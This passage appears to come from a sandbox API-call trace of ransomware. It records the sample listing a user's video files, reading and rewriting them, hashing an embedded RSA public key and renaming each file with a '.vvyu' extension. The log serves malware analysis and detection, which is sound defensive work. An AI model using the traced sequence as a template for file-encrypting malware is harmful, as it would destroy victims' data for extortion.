out: hHeap=0x6a0000) returned 1 [0197.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0197.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0197.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0197.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0197.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0197.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0197.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0197.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0197.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0197.402] WriteFile (in: hFile=0x52c, lpBuffer=0x2d4f778*, nNumberOfBytesToWrite=0x12745, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d4f778*, lpNumberOfBytesWritten=0x30ffb14*=0x12745, lpOverlapped=0x0) returned 1 [0197.404] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4f778 | out: hHeap=0x6a0000) returned 1 [0197.404] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x1274a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.404] WriteFile (in: hFile=0x52c, lpBuffer=0x2be2220*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2be2220*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0197.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0197.405] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0197.405] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0197.405] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0197.405] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0197.406] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0197.406] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0197.406] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0197.406] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.406] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0197.407] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0197.407] CloseHandle (hObject=0x52c) returned 1 [0197.408] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xe0) returned 0x6dc668 [0197.409] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8e0) returned 0x2d3a670 [0197.409] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc668 | out: hHeap=0x6a0000) returned 1 [0197.409] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\F72Mw_KNQRugYJJCcBc\\C9Qz99w\\82ajW1E0_3n2yYSE_.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\f72mw_knqrugyjjccbc\\c9qz99w\\82ajw1e0_3n2yyse_.avi"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\F72Mw_KNQRugYJJCcBc\\C9Qz99w\\82ajW1E0_3n2yYSE_.avi.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\f72mw_knqrugyjjccbc\\c9qz99w\\82ajw1e0_3n2yyse_.avi.vvyu")) returned 1 [0197.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0197.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0197.411] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0197.415] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0197.415] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7df31990, ftCreationTime.dwHighDateTime=0x1d8a5bf, ftLastAccessTime.dwLowDateTime=0x5a9366f0, ftLastAccessTime.dwHighDateTime=0x1d8a6e9, ftLastWriteTime.dwLowDateTime=0x5a9366f0, ftLastWriteTime.dwHighDateTime=0x1d8a6e9, nFileSizeHigh=0x0, nFileSizeLow=0x175d8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="b3JSk19CS30.avi", cAlternateFileName="B3JSK1~1.AVI")) returned 1 [0197.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0197.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x106) returned 0x2c4bb80 [0197.416] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0197.416] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\F72Mw_KNQRugYJJCcBc\\C9Qz99w\\b3JSk19CS30.avi") returned=".avi" [0197.416] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\F72Mw_KNQRugYJJCcBc\\C9Qz99w\\b3JSk19CS30.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\f72mw_knqrugyjjccbc\\c9qz99w\\b3jsk19cs30.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0197.417] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=95704) returned 1 [0197.417] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0197.421] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x175b2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.421] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0197.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0197.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0197.424] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.424] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x175d8, lpOverlapped=0x0) returned 1 [0197.425] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.425] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0197.426] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.426] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.426] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea920) returned 1 [0197.426] CryptCreateHash (in: hProv=0x6ea920, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0197.427] CryptHashData (hHash=0x2cbf990, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0197.427] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0197.427] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0197.427] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0197.427] GetLastError () returned 0x0 [0197.427] CryptDestroyHash (hHash=0x2cbf990) returned 1 [0197.427] CryptReleaseContext (hProv=0x6ea920, dwFlags=0x0) returned 1 [0197.427] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0197.427] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0197.427] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0197.427] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0197.427] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0197.427] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0197.427] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0197.427] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x175e0) returned 0x2d4f778 [0197.428] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0197.428] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0197.428] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0197.428] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0197.428] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0197.428] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0197.428] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d280 [0197.428] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a3a8 [0197.428] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d2c8 [0197.428] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a3c0 [0197.428] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a3f0 [0197.429] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a450 [0197.429] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a408 [0197.429] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0197.429] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0197.429] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0197.429] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0197.429] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3f0 | out: hHeap=0x6a0000) returned 1 [0197.429] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a408 | out: hHeap=0x6a0000) returned 1 [0197.429] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a450 | out: hHeap=0x6a0000) returned 1 [0197.429] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0197.429] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.429] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a450 [0197.429] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0197.430] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a408 [0197.430] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0197.430] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a3f0 [0197.430] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0197.430] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2be2220 [0197.430] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27748 [0197.430] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0197.430] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0197.430] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bec8 [0197.430] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c443e8 [0197.430] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0197.430] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0197.430] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a408 | out: hHeap=0x6a0000) returned 1 [0197.430] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0197.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3f0 | out: hHeap=0x6a0000) returned 1 [0197.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0197.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0197.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a450 | out: hHeap=0x6a0000) returned 1 [0197.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27748 | out: hHeap=0x6a0000) returned 1 [0197.431] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0197.432] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0197.432] GetCurrentThreadId () returned 0x264 [0197.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0197.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d4bc10 [0197.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84cc0 [0197.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea920 [0197.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d4d790 [0197.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0197.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0197.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0197.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.432] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.432] GetCurrentThreadId () returned 0x264 [0197.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.433] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0197.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.434] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.434] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0197.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0197.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0197.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0197.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0197.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0197.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0197.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a450 [0197.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0197.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0197.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0197.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0197.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0197.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0197.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0197.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0197.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a3f0 [0197.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0197.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0197.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0197.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0197.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0197.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0197.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0197.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a408 [0197.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0197.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0197.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0197.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a3d8 [0197.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0197.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a468 [0197.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0197.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0197.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0197.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a438 [0197.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0197.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a420 [0197.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0197.437] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a480 [0197.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a420 | out: hHeap=0x6a0000) returned 1 [0197.437] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a420 [0197.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a438 | out: hHeap=0x6a0000) returned 1 [0197.437] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0197.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0197.437] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0197.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0197.437] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27748 [0197.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3f0 | out: hHeap=0x6a0000) returned 1 [0197.437] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a3f0 [0197.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0197.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0197.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a450 | out: hHeap=0x6a0000) returned 1 [0197.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0197.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a480 | out: hHeap=0x6a0000) returned 1 [0197.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0197.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27748 | out: hHeap=0x6a0000) returned 1 [0197.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c0ec50 [0197.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0197.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bfe0 [0197.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3f0 | out: hHeap=0x6a0000) returned 1 [0197.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0197.438] HeapFree (in: hHeap=0x6a0000, 